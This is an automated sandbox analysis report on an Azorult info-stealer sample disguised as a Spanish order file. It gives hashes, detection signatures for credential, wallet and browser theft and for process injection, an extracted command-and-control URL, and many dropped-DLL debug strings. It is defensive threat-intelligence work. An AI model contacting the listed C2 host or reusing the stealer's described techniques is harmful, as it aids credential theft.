Windows Analysis Report
NUEVA ORDEN-MATSA 10-2022,.exe

Overview

General Information

Sample Name:	NUEVA ORDEN-MATSA 10-2022,.exe
Analysis ID:	715078
MD5:	5bb547610939ac07657f6216a28498cb
SHA1:	89eadfa478804f0a5798e26871ff45c4906349ee
SHA256:	3d70466e2cb7b2b051feb16750acb3b40af81f4595a0c0ffa865c13907820ca2
Tags:	AZORultexe
Infos:

Detection

Azorult

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Azorult

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Azorult Info Stealer

Antivirus / Scanner detection for submitted sample

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Machine Learning detection for sample

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

DLL side loading technique detected

Tries to harvest and steal Bitcoin Wallet information

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to steal Instant Messenger accounts or passwords

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Yara detected Credential Stealer

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

PE file does not import any functions

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Binary contains a suspicious time stamp

PE / OLE file has an invalid certificate

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: NUEVA ORDEN-MATSA 10-2022,.exe

ReversingLabs: Detection: 27%

Antivirus / Scanner detection for submitted sample

Source: NUEVA ORDEN-MATSA 10-2022,.exe

Avira: detected

Machine Learning detection for sample

Source: NUEVA ORDEN-MATSA 10-2022,.exe

Joe Sandbox ML: detected

Source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Azorult {"C2 url": "http://cinho.shop/PL341/index.php"}

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 1_2_004094C4 CryptUnprotectData,LocalFree,

1_2_004094C4

Source: NUEVA ORDEN-MATSA 10-2022,.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283784153.000000000825C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283874998.0000000008260000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268070409.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268608129.0000000007888000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268551087.0000000007884000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284321181.0000000007528000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: cvtres.exe, 00000001.00000003.273084362.00000000084C0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289682200.0000000008280000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275089189.00000000083A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: cvtres.exe, 00000001.00000003.277974574.00000000081D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277832553.00000000081D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277992608.00000000081D8000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.265401720.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.264246608.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267015957.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283458551.0000000008230000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283698525.000000000824C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283672079.0000000008248000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283746313.0000000008250000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267832549.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268762769.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284414482.00000000075F0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284181718.00000000075E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.264827087.0000000008398000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283512359.0000000008234000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283598432.0000000008238000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267278671.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283458551.0000000008230000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266752483.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283698525.000000000824C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283672079.0000000008248000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267651225.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vcruntime140.i386.pdbGCTL source: cvtres.exe, 00000001.00000003.276245137.00000000066AC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.290995859.0000000007858000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\NMCVXCXMXKJDFGDJKJDF.pdbBSJB source: NUEVA ORDEN-MATSA 10-2022,.exe
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.277832553.00000000081D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265957997.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268301473.000000000788C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268329300.0000000007874000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284181718.00000000075E0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.264406495.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277974574.00000000081D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277832553.00000000081D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283672079.0000000008248000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267505452.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\NMCVXCXMXKJDFGDJKJDF.pdb source: NUEVA ORDEN-MATSA 10-2022,.exe
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
Source:	Binary string: msvcp140.i386.pdb source: cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270034811.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270237118.0000000006694000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266283140.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: cvtres.exe, 00000001.00000003.273084362.00000000084C0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289682200.0000000008280000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275089189.00000000083A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BROTHERS.pdbBSJB source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250033059.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.251914030.0000000004A80000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266909184.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BROTHERS.pdb source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250033059.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.251914030.0000000004A80000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265791708.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.267391292.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278239292.00000000081F8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265263773.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278214445.00000000081F0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278227969.00000000081F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
